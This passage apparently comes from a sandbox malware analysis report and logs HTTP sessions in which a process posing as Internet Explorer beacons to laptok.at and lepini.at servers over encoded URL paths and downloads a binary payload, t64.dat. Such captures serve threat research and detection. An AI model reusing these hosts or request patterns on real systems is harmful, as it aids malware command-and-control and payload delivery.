                                                                                                                                            Nov 23, 2020 12:19:14.931549072 CET599INData Raw: 92 a6 c1 cc 97 d7 12 1e f3 81 59 aa 86 86 64 e7 0b 68 e9 06 88 07 fb 29 a4 01 b5 68 b0 c7 6f a2 02 f2 56 bc e1 d0 bc ee aa 52 31 21 45 54 ce 8a c3 02 15 47 df 9a eb b2 ba f8 51 15 68 b1 ea eb 70 7a 2c f7 18 4a fd ba 8e b9 2c 0d f6 79 fa 2f 8b 06
                                                                                                                                            Data Ascii: Ydh)hoVR1!ETGQhpz,J,y/_uV/IUfn/WH/(Le)u+&ZI\KvHG`#=m4]|J/44.?1#BzO_R@7YkN'LoP<OGf
                                                                                                                                            Nov 23, 2020 12:19:15.154159069 CET602INData Raw: 3b 9a f9 71 7e 7e fe 17 e9 04 1b b9 c2 fc 51 77 b5 2e 28 61 b4 44 ca 40 be 57 c3 ae 1b 2c b4 6f 1a 90 81 86 14 76 a1 07 74 eb 75 28 94 be 94 91 ae a5 48 ab 18 93 0b 9d f0 98 60 27 ac 96 1e 57 2b ee 25 e2 26 87 bc 20 40 b5 40 b1 1e a3 b9 93 c4 c0
                                                                                                                                            Data Ascii: ;q~~Qw.(aD@W,ovtu(H`'W+%& @@k^ d@Qk/#p%sYET>Pp;BC4u^\{c{PFn34E4L?d.S;Jj6F*>&%e/;WK


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            3192.168.2.44973747.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:19:16.872996092 CET877OUTGET /favicon.ico HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 23, 2020 12:19:17.668709993 CET883INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:19:17 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            4192.168.2.44974447.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:19:19.114414930 CET898OUTGET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1
                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                            Accept-Language: en-US
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            Host: api10.laptok.at
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 23, 2020 12:19:20.069576025 CET913INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:19:19 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 37 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 95 35 b2 e4 50 10 04 0f 34 86 98 8c 35 c4 ac 27 26 4f cc 34 a2 91 4e bf ff 02 1d 51 d1 59 59 db 9c df 94 0d da 16 5c 51 df f7 60 91 29 98 08 a1 fa 95 b6 73 81 48 5f b3 07 f9 ac 79 2e ec 6c 5b 49 6e 82 38 ae 4f 67 af 4b 83 54 b6 9a 19 3e ac e8 bb c3 d1 1b 3b d9 29 6c 76 1a 2b 74 5a e1 2e 51 78 2b ac e6 dc b0 31 88 bc 06 2f 99 c1 d7 50 96 c6 22 af ff fc a1 8c 6b 21 3d 2b 71 cb 41 5b bd a2 3e fb 65 9d f4 a8 01 19 9a 70 bd 6c 9a 17 c7 8b ce d9 36 4b 76 8f a8 e2 50 1f 6e 55 8b fb a5 97 e2 39 96 2d cf 72 1b c2 ca 41 3d 82 95 34 27 ff e2 b5 6c c3 8b f6 08 78 c6 a1 fd db a7 b2 f6 bb f9 2d 6c 6a 38 5d 49 0f 5b ce 54 1b 07 61 6b f5 2f c6 c3 ac a1 b9 9b ae 35 6f 67 d0 a8 c4 4d 9c 53 09 86 62 08 c5 eb b3 20 68 80 62 d2 fb 80 23 d2 11 99 5b 81 5b 4f e1 88 a6 88 d7 ed 87 5a 16 02 bb 8e 06 45 09 2d fe 09 52 88 b6 52 45 5c 95 a7 c6 82 e1 d1 7a 85 57 f7 ae d5 3f 2b 67 43 9a 95 0a 05 3a 74 dd 97 86 ef a5 88 a7 4f b5 09 a7 cc ca e4 16 54 d9 60 32 cb de 2f 9f 01 51 b1 d8 ec a4 a6 1f 5c 4b 9e c6 59 35 c2 4b fd c7 e6 50 b2 ec fa 07 ea 0c a5 e5 c2 8f 4e 76 ba 40 d7 ab cd 47 4a 9b e3 15 67 09 16 98 61 5c c7 5f 63 b7 38 f5 e7 5e 90 b7 99 b8 e8 c5 d5 e0 1b 66 bc 6a 87 20 9e e2 1b 66 cd ec d5 db 70 a8 5d 68 ee e7 96 d1 5b c2 6a 60 4b f5 e6 d3 f0 30 44 02 09 4d e8 f3 5c 3d 36 12 0a af 68 54 b7 26 44 2a 00 c8 35 6c e4 c6 8f 66 96 b3 4a 05 65 34 d1 b7 28 a0 bb 5c e2 b1 93 3c 0a c1 f8 64 9b af 72 b6 28 f9 4d 46 ab 9f 33 a1 f9 9e 7f 28 79 41 de 64 c5 db 94 7a 70 a0 91 c2 69 ab d1 13 b6 07 59 4c 35 0c 59 c2 6e 9c 01 c6 30 28 79 62 ac dc 67 6f f6 8e 77 b8 1c 9a b5 ab 6f 51 18 76 d9 a1 4c c0 e8 e8 7c 70 be 8b 31 a2 ba ed e4 a2 d2 b1 33 29 3a 3f cc 2c 6d 4f e7 a5 86 e9 b1 2d 39 27 92 38 f2 11 15 0d 0f db e5 ea 96 ba 4b a8 a0 2b 63 89 a2 e8 d2 cc 42 d4 29 e0 d5 c0 2a 87 a4 a1 c7 35 f0 85 ea ad 17 84 83 58 5f 02 27 90 07 87 aa cc 3a e9 a4 98 14 7c ee 51 cc 6e 6c d3 18 b4 9b a3 3d b4 b8 bc 26 52 b5 4d e2 5e f8 cd 6d 1f 08 1f 0e c2 4e c8 0f 65 58 71 47 e5 70 ce 27 dd b6 ef 14 2f 32 7f 31 33 cd ab 9f 11 e3 2f 67 f3 82 33 63 61 3b 25 f8 f9 76 ee c2 f3 9d 25 ed ba bf 5b b9 1d c3 f1 91 c6 c1 f7 5b 8d 63 ca ea ef 9a ca 4a e9 2b c8 33 f6 1b b5 b3 33 91 6e a7 a2 87 4c 2b 14 9a d2 2c e0 51 b8 65 d2 6e fd 76 32 15 a0 6d 51 e7 3b e8 3a c7 99 f3 f9 09 fe 7e 9f 2c 6d 31 5f fc 1d 98 ac 15 a4 92 aa ea 3b 94 b6 3f bc c7 3c 15 ee f2 6b 7b 1d f6 79 4b 61 56 de a4 ee 94 e0 03 f2 a7 05 29 ef 2a d1 88 5a 04 a0 aa 51 3b c0 4b f9 ab 29 8e 77 99 11 72 1a 3a be 97 1c 10 b3 cb 9c 27 58 d0 3d 33 08 94 6a a2 8e 36 38 66 26 5d 0f 6a cc 50 04 c3 02 e9 41 2e f2 56 ee c9 83 c9 87 33 81 e5 a0 bf f2 6f fc 7d be c4 c9 21 9d 8c 19 50 a4 8d bd 47 a0 89 d2 8f ab af 94 cc 01 c1 78 79 39 53 f5 5b a8 0b 88 16 22 7d 10 21 ad e8 d6 87 51 16 dd f1 e4 8f 79 03 42 40 9e bb 85 c8 4f 80 81 0b b1 ff 2b 18 91 67 9b 72 ca a3 96 df b8 34 3e cd 01 13 c8 92 0a 93 7e 15 c2 c0 84 0a 83 cd 3a 31 6d d9 aa a7 27 7b 39 cf 05 12 c2 86 0b 0a 9d 6b 68 40 28 4f e8 c3 41 93 8e 81 4b 15 3b c3 9b 25 bb 8a b9 d1 0c a1 c5 ca 15 88 17 0e cf a5 35 d6 db 15 51 ce e3 9d 5e 1c 85 25 d7 6e 92 8e cc d4 0e dc 43 18 d5
                                                                                                                                            Data Ascii: 73f5P45'&O4NQYY\Q`)sH_y.l[In8OgKT>;)lv+tZ.Qx+1/P"k!=+qA[>epl6KvPnU9-rA=4'lx-lj8]I[Tak/5ogMSb hb#[[OZE-RRE\zW?+gC:tOT`2/Q\KY5KPNv@GJga\_c8^fj fp]h[j`K0DM\=6hT&D*5lfJe4(\<dr(MF3(yAdzpiYL5Yn0(ybgowoQvL|p13):?,mO-9'8K+cB)*5X_':|Qnl=&RM^mNeXqGp'/213/g3ca;%v%[[cJ+33nL+,Qenv2mQ;:~,m1_;?<k{yKaV)*ZQ;K)wr:'X=3j68f&]jPA.V3o}!PGxy9S["}!QyB@O+gr4>~:1m'{9kh@(OAK;%5Q^%nC
                                                                                                                                            Nov 23, 2020 12:19:20.069654942 CET914INData Raw: bb 94 df f4 0f 14 72 39 7e 83 fa e6 c5 b5 82 7e ba f3 18 95 8b 02 4b d0 3c e2 c6 4b a0 21 6b 5d 5a 04 89 23 56 3a 77 2f e5 63 81 1a e5 7d 15 32 d2 c6 1e 35 62 05 42 8f 2e bb 76 5e 7c 72 e6 a2 94 d7 f7 ed 70 5d a9 7e 7a bf 0b 2b f1 97 85 fa 23 35
                                                                                                                                            Data Ascii: r9~~K<K!k]Z#V:w/c}25bB.v^|rp]~z+#5:'~/-?. s=Vtrd6}\0cD(~qm`Po=UZEO7BZo;C[]S.Lo.}1Q.8xJfS?{Pz@


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            5192.168.2.44976547.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:20:00.069071054 CET5675OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Host: c56.lepini.at
                                                                                                                                            Nov 23, 2020 12:20:00.715794086 CET5677INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:20:00 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 138820
                                                                                                                                            Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                            Connection: close
                                                                                                                                            ETag: "5db6b84e-21e44"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                            Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
                                                                                                                                            Nov 23, 2020 12:20:00.715840101 CET5678INData Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8
                                                                                                                                            Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8|ymf&ASxYE6*Vfy
                                                                                                                                            Nov 23, 2020 12:20:00.715887070 CET5679INData Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1
                                                                                                                                            Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
                                                                                                                                            Nov 23, 2020 12:20:00.715995073 CET5681INData Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23
                                                                                                                                            Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
                                                                                                                                            Nov 23, 2020 12:20:00.716034889 CET5682INData Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4
                                                                                                                                            Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
                                                                                                                                            Nov 23, 2020 12:20:00.716072083 CET5683INData Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63
                                                                                                                                            Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
                                                                                                                                            Nov 23, 2020 12:20:00.716110945 CET5685INData Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1
                                                                                                                                            Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
                                                                                                                                            Nov 23, 2020 12:20:00.716208935 CET5686INData Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77
                                                                                                                                            Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
                                                                                                                                            Nov 23, 2020 12:20:00.716249943 CET5688INData Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed
                                                                                                                                            Data Ascii: ^P_L1l`>up_`O`RC'2*%[Tj0#*@J|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
                                                                                                                                            Nov 23, 2020 12:20:00.716286898 CET5689INData Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59
                                                                                                                                            Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv|&g6wHLTk?N~d>,<AHkPyhv?R
                                                                                                                                            Nov 23, 2020 12:20:00.989725113 CET5691INData Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41
                                                                                                                                            Data Ascii: hG&|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            6192.168.2.44976647.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:20:13.752633095 CET5823OUTGET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                            Host: api3.lepini.at
                                                                                                                                            Nov 23, 2020 12:20:14.988385916 CET5832INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:20:14 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            7192.168.2.44976847.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 23, 2020 12:20:15.327480078 CET5833OUTPOST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Pragma: no-cache
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                            Content-Length: 2
                                                                                                                                            Host: api3.lepini.at
                                                                                                                                            Nov 23, 2020 12:20:15.330399990 CET5833OUTData Raw: 0d 0a
                                                                                                                                            Data Ascii:
                                                                                                                                            Nov 23, 2020 12:20:16.533633947 CET5833INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 23 Nov 2020 11:20:16 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                            X-Content-Type-Options: nosniff
